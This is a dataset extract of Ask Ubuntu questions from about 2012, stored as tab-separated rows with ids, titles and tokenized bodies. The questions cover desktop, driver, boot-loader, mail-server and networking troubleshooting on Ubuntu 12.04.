_smr_smtp9.netcore.co.in ok : queued as 517cef7e69 ) as root user from terminal : sep 24 20:44:56 ubuntubackup-chennai sendmail [ 6167 ] : q8ofetso006167 : from=root , size=281 , class=0 , nrcpts=1 , msgid= < 201209241514.q8ofetso006167 @ localhost.localdomain > , relay=root @ localhost sep 24 20:44:56 ubuntubackup-chennai sendmail [ 6168 ] : q8ofeubx006168 : from= < root @ localhost.localdomain > , size=555 , class=0 , nrcpts=1 , msgid= < 201209241514.q8ofetso006167 @ localhost.localdomain > , proto=esmtp , daemon=mta , relay=localhost.localdomain [ 127.0.0.1 ] sep 24 20:44:56 ubuntubackup-chennai sendmail [ 6167 ] : q8ofetso006167 : to=karthick @ **** , ctladdr=root ( 0/0 ) , delay=00:00:01 , xdelay=00:00:00 , mailer=relay , pri=30281 , relay= [ 127.0.0.1 ] [ 127.0.0.1 ] , dsn=2.0.0 , stat=sent ( q8ofeubx006168 message accepted for delivery ) sep 24 20:44:56 ubuntubackup-chennai sendmail [ 6170 ] : q8ofeubx006168 : to= < karthick @ ****.com > , ctladdr= < root @ localhost.localdomain > ( 0/0 ) , delay=00:00:00 , xdelay=00:00:00 , mailer=relay , pri=120555 , relay=smtp10.netcore.co.in . [ 202.162.229.32 ] , dsn=2.0.0 , stat=sent ( _smr_smtp12.netcore.co.in ok : queued as 727a519942 ) note : mail received from root user & nagios user but not from nagios webui . entry in hosts file : /etc/hosts 127.0.0.1 localhost.localdomain localhost ubuntubackup : :1 localhost6.localdomain6 localhost6
192507	ca n't enable third monitor on second graphics card	i had a system running 12.04 with a radeon hd4870 , and had the monitors correctly setup . i installed a second video card ( radeo hd5700 ) , and ca n't get the default monitor app to detect the monitor . the hd4870 has two displays connected via dvi , and the hd5700 has one display connected via dvi - vga adapter . it appears that both cards are detected via lspci | grep vga : 06:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv770 [ radeon hd 4870 ] 07:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati juniper [ radeon hd 5700 series ] but i ca n't seem to get anything to show up on the new monitor . i tried looking into xorg.conf , but it did n't have anything in there that would have given me any hints . xorg.conf : section `` screen '' identifier `` default screen '' defaultdepth 24 endsection section `` module '' load `` glx '' endsection any suggestions on how to proceed ? note : i also tried to install the ati-proprietary drivers , and it would n't allow the setup i wanted due to xinerama not allowing large enough desktop areas .
192508	will unity stop being a plugin for compiz ?	i ask this as with the unity desktop running , when i try any games with my ubuntu 12.04.1 i get so much frame rate drop with unity and compiz . if i switch to gnome-classic which uses mutter , i get a vast boost in performance . my system is an 8 core amd with a nvidia 460 se that can play anything i chuck at it in windows and i 'm using the latest nvidia drivers , but even simple games like the humble bundle gets serious lag with unity and the only cause of this can be compiz ( what i can guess ) . when steam come to ubuntu , how will this performance loss be addressed ?
192509	default ubuntu server credentials ?	i 'm running ubuntu server through vmplayer but i do n't know , nor can find the login credentials . can some one let me know please ? thanks .
192518	samba shares on ubuntu do n't report free space	i 'm connecting to a dns-323 network storage from my ubuntu 12.04 computer . the connection to the two shared drives from the nas is working fine but there is no way i can look at the free space on each of those two shared drives . in windows when connecting to those drives i see no difference from local drives and i can use them in any app and see the free space in `` properties '' . in ubuntu those shared drives seem to have a special status and i can not use them from some applications ( the network drives are not listed when selecting `` open '' ) . is there a way to mount a samba drive in ubuntu so it looks like a local drive and the free space can be checked ?
192521	how to completely uninstall lxde ( 12.04 ) ?	i 'm trying to remove lxde from my 12.04 system . i 've tried running the following commands ( as root from a terminal ) : apt-get remove lxde apt-get purge lxde apt-get autoremove i 've also tried a rather lengthy command that was linked to from another question . however , when i log in , lxde is still presented as an environment choice , and it still functions perfectly well , as if i 've done nothing . i ran the above commands again , but got the following message : package . . . is not installed , so not removed . so , where do i go from here , short of re-installing ubuntu and all my programs ?
192522	how do i configure sound with pulseaudio and multiseat ?	in the spirit of full disclosure , i just posted this question to the ubuntu forums , but i figure more heads working on it could n't hurt . i have a multi-seat setup working quite well . hot plugging input devices works as expected and such . the only issue i am still not able to resolve is getting the audio for each seat . here is a summary of my attempts at getting audio to work : make ~/.pulse/default.pa dynamically configured based on which $ display the user logs in at . see this pastebin for the details . load pulseaudio as a system-wide instance . could n't get this to work . none of the audio hardware was accessible to the users . use udev rules to mark seats in consolekit . following udev guidelines found here : http : //www.freedesktop.org/wiki/software/systemd/multiseat i did n't think this would work , although it was `` guaranteed '' to work by someone in irc.freenode # pulseaudio none of those attempts yielded success , which is why i now turn to the community for help . it is quite possible that the suggested methods work and i just messed some aspect of it up , idk . this is the last piece of the puzzle which is needed before i can go and update the multiseatx page to include instructions for ubuntu 12.04 . my understandings on the situation : access to pulseaudio is restricted to the active session as marked by consolekit ( something about an acl ) . ck can only mark one session as active at a time . this simple little fact of life leads me to believe that the solution should involve pulseaudio being run as a system-wide instance . each user should connect to the pulse server and be limited to a subset of all the hardware . maybe each user connects to the pulse server via localhost , idk . i do know that regardless of my attempts and their failed results , i was always able to use sudo aplay -d plughw:0,0 /usr/share/sounds/alsa/front_center.wav to play something to any of the hardware . i 'm grasping at straws and am now down to the last few hairs i can pull out of my head . please , help me figure this out so we can share the wealth . any additional information needed will be provided at your request .
192527	problem with `sudo halt` command	when you execute a command ( sudo halt ) command system stops working so you execute this command on another set of computers and the result was that the freeze system
192530	login and password for ubuntu	hi i have an old toshiba pc satellite p20 , ubuntu is installed , i had a black out of the pc and when i switch-on , on the screen appears : toshiba , ubuntu and than black screen with written : e-toshiba login : password : administrator is : enrica password of ubuntu : alessandro but everytime answer is ; incorrect login i made also photos so you can undertand better , please give me an email address thank you for your help . renato renzi - italy
192531	delete minimize button	is there a way to get rid of the minimize button when the window is maximized ? i 've already gone into gconf-editor /apps/metacity/general/button_layout and changed `` close , minimize , maximize '' to `` close , maximize '' but that does n't affect the buttons when windows are maximized .
192539	10.04 server wo n't boot off latest kernel	i 'm maintaining a 10.04 server that is still booting off of the 2.6.32-28 kernel even though a bunch of later kernels are available . my best guess is that the immediately following version was purged from dpkg . when i run : dpkg -- list 'linux-image*' i get : un linux-image < none > ( no description available ) un linux-image-2.6 < none > ( no description available ) un linux-image-2.6.24-23-server < none > ( no description available ) ii linux-image-2.6.32-28-server 2.6.32-28.55 linux kernel image for version 2.6.32 on x86_64 un linux-image-2.6.32-31-server < none > ( no description available ) un linux-image-2.6.32-33-server < none > ( no description available ) un linux-image-2.6.32-34-server < none > ( no description available ) ii linux-image-2.6.32-37-server 2.6.32-37.81 linux kernel image for version 2.6.32 on x86_64 ii linux-image-2.6.32-38-server 2.6.32-38.83 linux kernel image for version 2.6.32 on x86_64 ii linux-image-2.6.32-41-server 2.6.32-41.94 linux kernel image for version 2.6.32 on x86_64 ii linux-image-2.6.32-42-server 2.6.32-42.95 linux kernel image for version 2.6.32 on x86_64 in linux-image-2.6.32-43-server < none > ( no description available ) iu linux-image-server 2.6.32.43.50 linux kernel image on server equipment . and uname -r prints : `` 2.6.32-28-server '' i do n't know how it got like this , but i think it might be from a script that last server admin had run to automatically delete old kernels . anyways , if i reinstall *-image-2.6.32-31 , should it automatically run off of it after a reboot ? or is there another/simpler way to get to the latest version without reinstalling the purged kernels ? this is a live server , and i 'd do n't want to go guessing and checking on this one . fyi , this whole problem stems from the fact that the hosting company of this server set up to boot partition to only be 80m and it 's currently maxed out .
192541	can i run ubuntu applications in xubuntu ?	can i run ubuntu applications in xubuntu ? are there any problems doing so ? can gnome applications run in xfce-based systems ? sorry for errors . i 'm a newbie in this linux-based operation system concept .
192544	a recommended subtitle editor for ubuntu	when i was using windows , i used to edit subtitles with subtitle workshop which is a quite good . does anyone can recommend about a good subtitle editor for ubuntu ?
192554	chrome would be hang when some web page	the environment is the latest version of chrome and ubuntu 12.04 . when i use chrome to open web page , it would hang , and i can not say the exact frequent . after i disable the flash plugins in chrome : //plugins , chrome would also hang when i open web page . but , when the chrome hang , i could resize the chrome windows , after this action , the chrome would be active . please help .
192555	how to change color of the frame of a maximizing window	though i have read and tried some advises regarding the change of colors in a theme , i found no answer regarding my question , which is : when i drag a window to the left ( or right or up ) side of the screen an orange frame shows up , indicating the area that the window will occupy . this frame is in orange . can you please inform me how can i change this color to blueish , to match my theme ? at this point , i would like to inform you that zorin os has this blueish frame instead of orange , but i do not know where this color comes from .
192557	installing ubuntu one on ubuntu 11.10 server	i have installed `` ubuntu one '' on an ubuntu server 11.10 based on these instructions : how do i configure ubuntu one on a 11.10 server ? everything went smooth during installation . however when i try the command : u1sdtool -- start to get the server up , i get the following stack error : u1sdtool -- start /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/init.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) unhandled error traceback ( most recent call last ) : dbus.exceptions.dbusexception : org.freedesktop.dbus.error.notsupported : unable to autolaunch a dbus-daemon without a $ display for x11 does anyone have a clue how to solve this issue ?
192560	how to change thickness/width of arrow head ?	when drawing an arrow in libreoffice draw ( or impress ) i can change the width of the line , but not the arrowhead itself . how can i change the width of the arrow head ?
192563	using fix-boot but still stuck	i have a laptop i used to use for college that was ubuntu 10.4 /vista / win7 . i pulled it out and proceeded to install 12.04 advanced partitioning . it was sda1 ubuntu / swap / vista / and sda5 win7 . i deleted the ubuntu , swap and vista , leaving 7 alone . i 'm using it now but ca n't get to win7 . i used fix-boot several times using variations on the advanced menus . so i finally purged grub and forced grup-pc in the advanced setting of fix-boot . here is a link to the report ; http : //paste.ubuntu.com/1225051/ i 'm sure there is a way to edit the grub to get 7 to show as a boot choice and hope someone can point it out for me . thanks
192564	react to a modified directory	in linux everything is considered as file , now if i want to find only folders/directories not the files then how can i do that ? i am getting all the modified files with the following command . find /users/ghanshyam -type f -mmin -5 -print my goal is to generate the log file with all the modified/access folders . here two options are available . create a module and call every time when a folder is modified ( this one is bit difficult because i need to check particular event ) create a cron task that will run after every 5 minutes . cron task will execute shell script and generate the log entries with the modified folders . do you have any other option to do this task ?
192566	how do i verify that syndaemon is disabling the touchpad while i type ?	i thought that i had set syndaemon to disable the touchpad while i type , and for 0.8 seconds afterwards . in order to change the default touchpad delay of 2.0 seconds , which is hard-coded into the touchpad settings dialog , i unchecked `` disable touchpad while typing '' and added `` syndaemon -i 0.8 -k -r -t '' to the list of startup applications . most of the time now , the touchpad does n't register taps while i type , as i want . however , sometimes while typing , the cursor still flicks to a random spot in the text box , even while i am in the middle of typing . i do n't take anywhere near 0.8 seconds between keystrokes - what could be happening here ? to verify that syndaemon is running with the correct options when the unwanted behavior occurs , i run : $ ps -ef | grep syndaemon user 1840 1747 0 sep23 ? 00:00:00 syndaemon -i 0.8 -k -r -t everything seems fine . what could the problem be ? how do i go about finding out if syndaemon is to blame ?
192567	update drivers for tl-wn851nd	today i bought a new pci wireless card , tp-link wn851nd , with atheros ar9227 chipset . it has 2 antennas and is compatible with wifi n so i thought it would improve the quality of the signal . but after installing it on my computer , the result is the opposite to what was expected . it does n't connect to my network , while my old wifi bg card connect without problems , i created an access point from my smartphone to try the card , and it worked , but is very slow loading pages . in windows 7 , it works perfectly , so i think the problem is the driver . i have 12.04 with kernel 3.2.0.31 , is there a way to update the driver or i can apply a patch to improve the performance of the card ? otherwise , anyone know if there is a work in progress to improve compatibility with this chipset , or is it better to change the card and buy one with better driver compatibility ? and finally , which wireless n compatible chipsets have good support under linux/ubuntu ?
192572	how read local email in thunderbird ?	i just install postfix and configure it for local email only as a way to have a sendmail program and test my php scripts . my question is , how can i use an html capable email client like thunderbird to read local ( root email , etc . ) emails ?
192575	is there a tool to manage dash lenses ?	my ubuntu 12.04 dash has become a clutter on lenses . at first i installed every lens i found on the internet . most of them now i seldom use . so , is there any quick way to add/hide/remove lenses ?
192576	override custom keyboard shortcut limit	i would like to add a custom keyboard shortcut for the `` home '' button , but i get the error : the shortcut `` home '' can not be used because it will become impossible to type using this key . i am using this system for a kiosk and will have no other need for the home button other than for triggering a script . is there any way to override this limit ? using ubuntu 12.04
192584	recommendation for a dictation software	any recommendations for a good , free dictation software for ubuntu , and linux in general ?
192587	ubuntu one deleted files in cloud	i stopped syncing a folder in one pc and then deleted it but the folder is deleted from the ubuntu one cloud storage as well , what went wrong ?
192588	is it possible to install paid apps in a development release ?	i wonder if it is somehow possible to install paid applications in a development release of ubuntu ? i think most packages could be easily installed , though is there a way i can convince ubuntu software center to think i am running the older version of ubuntu so i can install those apps ? thank you .
192590	what to do when gnome-shell freezes ?	everything works correctly ( music is still playing etc . ) , just the gui freezes . i am able to ctrl+alt+f1 . what can i do after logging in the ctrl+alt+f1 terminal , in order to restore gnome-shell ? if gnome-shell worked , i 'd just hit alt+f2 and run r. i usually end up sudo rebooting which i do n't like , because i have to reopen apps .
192596	installed ubuntu with wubi , how can i completely remove windows vista ?	i just installed ubuntu 12.04.1 yesterday , and i 'm happy with how it 's working . i think i installed it as a dual system though , because ubuntu and vista shows up when the system boots up . i installed ubuntu using wubi . i do not want vista on my computer anymore . is there a way to delete it without corrupting my laptop ?
192598	pidgin script with python/ get focus signal	i am creating a script in python to integrate pidgin with unity ( 12.04 ) , i 've managed to do the counting notifications system using the launcher api . but i dont know what event or signal is activated when the conversation window gains focus ( to clear the message counter ) . i 've tried some of the signals available on the documentation of pidgin but none of them worked . is there any gtk ( or anything ) event that is triggered when the window chat gets focus ?
192602	pptp server stuck at `` gre : bad checksum from pppd ''	i am a network engineer having quite limited experience with ubuntu . i have been following up these online instructions to set up a pptp server but without much luck to get it to work . my server is a vm running an apple xserve behind a cisco firewall . i made sure tcp 1723 and gre are opened for the box . below is the syslog output , looks like i always got stuck at gre : bad checksum from pppd . i 'm running ubuntu 10.04 . sep 24 13:21:53 ubuntu pptpd [ 1231 ] : ctrl : pty read or gre write failed ( pty , gre ) = ( 6,7 ) sep 24 13:21:53 ubuntu pptpd [ 1231 ] : ctrl : reaping child ppp [ 1232 ] sep 24 13:21:53 ubuntu pptpd [ 1231 ] : ctrl : client 166.137.85.165 control connection finished sep 24 13:22:41 ubuntu pptpd [ 1276 ] : mgr : connections limit ( 100 ) reached , extra ip addresses ignored sep 24 13:22:41 ubuntu pptpd [ 1277 ] : mgr : manager process started sep 24 13:22:41 ubuntu pptpd [ 1277 ] : mgr : maximum of 100 connections available sep 24 13:22:50 ubuntu pptpd [ 1278 ] : ctrl : client 166.137.85.165 control connection started sep 24 13:22:51 ubuntu pptpd [ 1278 ] : ctrl : starting call ( launching pppd , opening gre ) sep 24 13:22:51 ubuntu pppd [ 1279 ] : plugin /usr/lib/pptpd/pptpd-logwtmp.so loaded . sep 24 13:22:51 ubuntu pppd [ 1279 ] : pppd 2.4.5 started by root , uid 0 sep 24 13:22:51 ubuntu pppd [ 1279 ] : using interface ppp0 sep 24 13:22:51 ubuntu pppd [ 1279 ] : connect : ppp0 < -- > /dev/pts/1 sep 24 13:22:51 ubuntu pptpd [ 1278 ] : gre : bad checksum from pppd . sep 24 13:23:21 ubuntu pppd [ 1279 ] : lcp : timeout sending config-requests sep 24 13:23:21 ubuntu pppd [ 1279 ] : connection terminated . sep 24 13:23:21 ubuntu pppd [ 1279 ] : modem hangup sep 24 13:23:21 ubuntu pppd [ 1279 ] : exit . sep 24 13:23:21 ubuntu pptpd [ 1278 ] : gre : read ( fd=6 , buffer=805a540 , len=8196 ) from pty failed : status = -1 error = input/output error , usually caused by unexpected termination of pppd , check option syntax and pppd logs sep 24 13:23:21 ubuntu pptpd [ 1278 ] : ctrl : pty read or gre write failed ( pty , gre ) = ( 6,7 ) sep 24 13:23:21 ubuntu pptpd [ 1278 ] : ctrl : reaping child ppp [ 1279 ] sep 24 13:23:21 ubuntu pptpd [ 1278 ] : ctrl : client 166.137.85.165 control connection finished
192605	how do i get another key binding for alt+printscreen ?	now , that ubuntu 12.04 has the hud popping up if you press the alt key , alt+printscreen only ends up taking screenshot of the launcher on the left . how do i get another key binding for alt+printscreen ?
192606	how do i get graphics drivers / bluetooth / card reader working on an acer aspire v3-571g ?	a couple of days ago i bought an acer aspire v3-571g laptop without a system installed on it . the only thing that was there was linux linpus . i created a bootable cd with ubuntu 12.04 64-bit - i read that my processor was 64 bit and that it might be a good configuration for my gear ( i 'm not especially fluent with all the computer stuff , still trying to learn ) and replaced linpus with ubuntu . everything seemed to work fine , but there 're few exceptions to that which came pass my way . my bluetooth does n't work . it seems to be switched on , but when i check my system settings the button is actually off , and i ca n't drag it 'perminently ' to the 'on ' position . tried a couple of commands i found on the net , none of them helped and there was no word whatsoever in my bios settings about enabling bluetooth . my card reader has some serious problems with copying more than one file at a time . i tried to put some music on my phone through a microsd card adapter ( because my bluetooth does n't work ) and it got stuck every single time i copied an album on it . i 'm not sure if all my drivers were properly installed , so i checked in the terminal if it could tell me sth about my graphics . typed : sudo lshw -c display and what i got was : *-display unclaimed description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller cap_list configuration : latency=0 resources : memory : b2000000-b2ffffff memory : a0000000-afffffff memory : b0000000-b1ffffff ioport:2000 ( size=128 ) *-display description : vga compatible controller product : ivy bridge graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : b3000000-b33fffff memory : c0000000-cfffffff ioport:3000 ( size=64 ) as i said i 'm no expert and not english-speaking generally , but it does n't seem to be right . i 've got a nvidia geforce gt 640m .
192609	how to get the size for all subdirs in krusader	in total commander it was alt + shift + enter . is the same possible in krusader ? ( i am talking about in-place calculations so please no properties window suggestions ) .
192612	grub boot loader problems	i 've had ubuntu for about two months and its worked flawlessly but yesterday when i booted it up i got a screen that said grub 1.99 ( grub rescue screen ) it asks to hit tab to display commands except for none of the commands work . someone please help me get ubuntu booted and running again !
192620	how to make ubuntu iso bootable on a usb stick with osx ?	i have a macbookpro and i 'm planning to create a multiple boot . i 've already created the necessary partitions and downloaded image file ( i386 ) when i try to create a bootable usb stick from the iso file , by means of `` recovering '' the disk image into the usb drive using disk image utility , i get the following message : could not validate source - corrupt image the disk image ca n't be mounted in osx either , i also get a similar message . is there any way to make a bootable ubuntu usb stick from an iso image in osx ? thanks
192621	grub rescue prompt , repair grub	i recently repartitioned my hdd and i have damaged grub on my system . on boot i get the grub rescue prompt and i have to go through the following steps in order to boot normally : set root= ( hd0 , msdos6 ) set prefix= ( hd0 , msdos6 ) /boot/grub insmod normal normal ( those steps were found on another post on here ! ) . i 'm very tired of repeating this on every boot , how do i permanently fix grub ?
192624	error setting kb layout with `setxkbmap`	i have x11-forwarding set up from an ubuntu 12.04 vm to my ( windows ) laptop . it works , but when i type in the forwarded applications , it is using the qwerty layout and i would like it to use colemak . i would like a command-line solution since i do n't have the gui installed in the vm . i have tried setxkbmap -v us -variant colemak , but i get `` error loading new keyboard description '' : $ setxkbmap -v us -variant colemak warning ! multiple definitions of keyboard layout using command line , ignoring x server warning ! multiple definitions of layout variant using command line , ignoring x server trying to build keymap using the following components : keycodes : xfree86+aliases ( qwerty ) types : complete compat : complete symbols : pc+us ( colemak ) geometry : pc ( pc101 ) error loading new keyboard description i also tried setxkbmap -v us -variant dvorak , which did seem to work . what is wrong ? colemak comes with ubuntu , and i can see a section for it in /usr/share/x11/xkb/symbols/us , which is where the layout is defined , i assume .
192626	ca n't have overlapping partitions	i have a machine running ubuntu 12.04 and windows 8 on dual boot . i created a ntfs partition to do easy switching but as there were only 4 partition possible , i unknowingly deleted system reserved partition for windows , so it did n't boot but ubuntu was running fine . so , i read somewhere to use live windows usb to restore windows 8 system reserved partition and when i did automatic recovery , i think it created a partition and now i can not access my linux ext4 partition . gparted gives error `` ca n't have overlapping partition '' and shows one unallocated block . system is also not booting and ls on grub rescue is not even showing ( hd0 , msdos4 ) which is shown in fdisk . the output of fdisk -l /dev/sda is : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x519763e3 device start end blocks id system /dev/sda1 2048 31264767 15631360 27 hidden ntfs winre /dev/sda2* 31264768 31469567 102400 7 hpfs/ntfs/exfat /dev/sda3 31469568 271835135 120182784 7 hpfs/ntfs/exfat /dev/sda4 271837182 590538751 159350785 5 extended /dev/sda5 590538752 976773119 193117184 7 hpfs/ntfs/exfat /dev/sda6 579627008 590536703 5454848 82 linux swap / solaris partition table entries are not in disk order please help me knowing what to do , i need to access my ubuntu partition to at least recover some files . also if you could tell which commands i can use to get it working .
192628	ubuntu 12.04 server auto mount usb to static location	i am trying to get a usb external hard drive ( ext4 ) to automatically mount when it is plugged in . i used to have it working but has since stopped . i have tried the usbmount package however it will mount it at /media/usb # and the number can change depending on the order in which it is plugged in to . the drive has a label so is it possible to auto mount the drive to /media/drivelabel also when unmounted the directory should not exist as a program automatically backs up to the drive when it is seen , if the directory is there it backs up to the local disk . thanks harv
192631	flash maximizes to wrong monitor	is it possible to control which monitor applications ( flash esp . ) maximize to ? if it matters i 'm using my cpu 's internal video chip ( hd4000 ) .
192639	need to manually install bootloader	grub failure when installing 12.4 alongside windows 7 ( 50 gb partition for 12.4 ) , need to manually install bootloader . where can i find this ?
192640	where to get docklets	i am very new to ubuntu and feel a bit overwhelmed at times . i downloaded docky because i think its handy but i only see a limited amount of docklets in the docky settings . trying to search and find an answer to this ive noticed on other peoples screenshots that they have many docklets . is there another way to get these docklets besides from the docky settings menu ?
192641	how to disable sticky edges via command line ?	i know how to disable sticky edges via the settings- > display ui , however , i want to be able to do it via command line or config file . does anyone know how to disable `` sticky edges '' via a command or config file ? where does ubuntu store the config option ?
192644	torchlight is missing some textures	i am using a radon hd6850 and just bought the indi bundle . torchlight is missing all face textures ( and face textures only ) . i have had problems with shaders before ( graphic would be displayed as black ) , but what i am seeing now is a simple removal of the texture , i can see through the head . the fps is fine on full graphics so it does n't seem to be too much of a driver issue ( i am using the drivers that came with ubuntu ) . i downloaded the game through the usc . has anyone had this issue and managed to fix it ? running ubuntu 12.04 lts
192645	make command not found	i am having a problem that does n't seem to be common based on searching various forums . i can not run the make command . msg : the program 'make ' is currently not installed . you can install it by typing : sudo apt-get install make so do this : sudo apt-get install make reading package lists ... done building dependency tree reading state information ... done make is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . but then when i try to run make i get the same message . what 's up ? edit : ubuntu 12.04 64bit desktop fresh install .
192646	how to make sysctl network bridge settings persist after a reboot ?	i am setting up a notebook for software demo purpose . the machine has 8gb ram , a core i7 intel cpu , a 128gb ssd , and runs ubuntu 12.04 lts 64bit . the notebook is used as a kvm host and runs a few kvm guests . all such guests use the virbr0 default bridge . to enable them to communicate with each other using multicast , i added the following to the host 's /etc/sysctl.conf , as shown below net.bridge.bridge-nf-call-ip6tables = 0 net.bridge.bridge-nf-call-iptables = 0 net.bridge.bridge-nf-call-arptables = 0 afterwards , following man sysctl ( 8 ) , i issued the following : sudo /sbin/sysctl -p /etc/sysctl.conf my understanding is that this should make these settings persist over reboots . i tested it , and was surprised to find out the following : root @ sdn1 : /proc/sys/net/bridge # more *tables : : : : : : : : : : : : : : bridge-nf-call-arptables : : : : : : : : : : : : : : 1 : : : : : : : : : : : : : : bridge-nf-call-ip6tables : : : : : : : : : : : : : : 1 : : : : : : : : : : : : : : bridge-nf-call-iptables : : : : : : : : : : : : : : 1 all defaults are coming back ! yes . i can use some kludgy `` get arounds '' such as putting a /sbin/sysctl -p /etc/sysctl.conf into the host 's /etc/rc.local but i would rather `` do it right '' . did i misunderstand the man page or is there something that i missed ? thanks for any hints . -- zack
192652	how to install kzenexplorer ?	i just got an old creative zen micro . i plugged it into the computer , and the system would n't acknowledge that there was any sort of device plugged in . turns out creative zen micros were only made to run on windows systems . then i find out that there 's this program you can install for linux systems called kzenexplorer , and it 's supposed to enable your system to detect the device and manage it . the package is a tar.bz2 file , and i found out how to install that sort of package , but when i tried to do it that way , it got stuck in the configuration process and had an error that would n't let me proceed normally . the website for kzenexplorer mentioned something about required libraries and listed them off . there were only two of them , libnjb and taglib . i looked up more information and a bunch of people on multiple different forums were talking about how they had to download the libraries , and build the package themselves or something like that . first of all , i have no idea where to put these libraries , what they do , how to build anything , i really have no clue how to go about doing this at all . i 'm stuck , i 'm losing patience . if anyone knows anything about kzenexplorer and how to get it to run on ubuntu 12.04 .
192654	i need a good network monitoring tool	i need to get some good network monitoring tools . i am trying to find out why my office network is so congested/slow , and i need something that will allow me to look at all the machines in the network and see who is being a piggy .
192658	can nautilus automatically close the window after a file is opened ?	in mac 's os x , if you hold option while opening a file , the nautilus window will automatically close ( after opening the file ) . this works whether you double-click the file or use the keyboard shortcut ( command-o ) . is there an equivalent in nautilus ?
192660	performance problem with ubuntu x64	i have an i7 processor with 32 gb of ram . i installed ubuntu 64 bit and feel that performance is below expectations . someone would have an answer to this situation ? eu tenho um processador i7 com 32 gb de memória ram . eu instalei o ubuntu 64 bits e sinto que o desempenho esta abaixo do esperado . álguém teria uma resposta para esta situação ?
192663	12.04 stopped recognizing windows partitions after update	yesterday i made a system update and it worked well . i then shut down and working inside windows 7 x64 . although , right now i want to work inside ubuntu but i can not see the partitions and usb removable disks are not recognized anymore . could you help me how to fix this ?
192667	deleted almost everything . recovery methods ?	i deleted almost everything on the system except chromium and pdf i guess . no software centre no apt-get . i mean there is nothing . is there anyway i can restore all the bundled software etc with 12.04 ?
192669	port listening on localhost:8000 but not on ip:8000	hello i 'm running a web application on port 8000 . when i access it from the host server localhost:8000 it responds ok , 127.0.0.1:8000 also works , but 192.168.1.7:8000 does not work . 192.168.1.7 is the ip of my server . also if i try to go to another web application running on port 80 it works 192.168.1.7 i enabled ufw firewall and set ufw default allow . i am using ubuntu server 12.04 any suggestions on why i ca n't get to my app on port 8000 using the ip-address:8000 ? thanks in advance !
192672	hp envy 15 3040nr sound issues	i have successfully set up my envy 15 '' for ubuntu 12.04 except for the sound , anyone have any ideas about how to get it working ? i had to blacklist snd-usb-audio to my alsa to stop pulseaudio from freezing on login and logout , but now no sound plays . could anyone provide me with some guidance ? lspci info 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:01.1 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:01.2 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.7 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 8 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ amd radeon hd 6600m series ] 09:00.0 network controller : intel corporation centrino advanced-n 6230 ( rev 34 ) 0a:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5116 pci express card reader ( rev 01 ) 10:00.0 ethernet controller : atheros communications inc. ar8151 v2.0 gigabit ethernet ( rev c0 ) 11:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) also going into the sound tab shows dummy output so it seems to me that it is not recognizing the sound card .
192680	i upgraded my server to 12.10 , why does php not work with nginx ?	i upgraded and now i ca n't use my nginx 's proxy_pass arguments on my ubuntu server to work with php . i keep getting 502 bad gateway errors . why is this , and how do i fix this ?
192684	postfix + dovecot - not receiving mail in vmail directory	i have been spending countless hours on this and now i figured id come to the 'internet ' for help . i have installed a new install of postfix + dovecot + mysql . right now , i am able to receive email from my one mapped account 'sean @ domain.com' but for some reason all messages get inserted into /var/mail/sean the expected location is : /var/vmail/domain.com/sean ill list the key pieces of code ive used to get this working . postfix master.cf dovecot unix - n n - - pipe flags=drhu user=vmail : mail argv=/usr/lib/dovecot/deliver -d $ { recipient } postfix main.cf virtual_transport = dovecot dovecot_destination_recipient_limit = 1 dovecot 10-mail.conf mail_location = maildir : /var/vmail/ % d/ % n mail_uid = vmail mail_gid = mail first_valid_uid = 150 last_valid_uid = 150 dovecot 10-auth.conf disable_plaintext_auth = yes ! include auth-sql.conf.ext dovecot auth-sql.conf.ext passdb { driver = sql args = /etc/dovecot/dovecot-sql.conf.ext } userdb { driver = sql args = /etc/dovecot/dovecot-sql.conf.ext } dovecot dovecot-sql.conf.ext driver = mysql connect = host=localhost dbname=mail user=mail password=p @ ssw0rd default_pass_scheme = md5-crypt password_query = \ select username as user , password , '/var/vmail/ % d/ % n ' as userdb_home , \ 'maildir : /var/vmail/ % d/ % n ' as userdb_mail , 150 as userdb_uid , 8 as userdb_gid \ from mailbox where username = ' % u ' and active = '1' 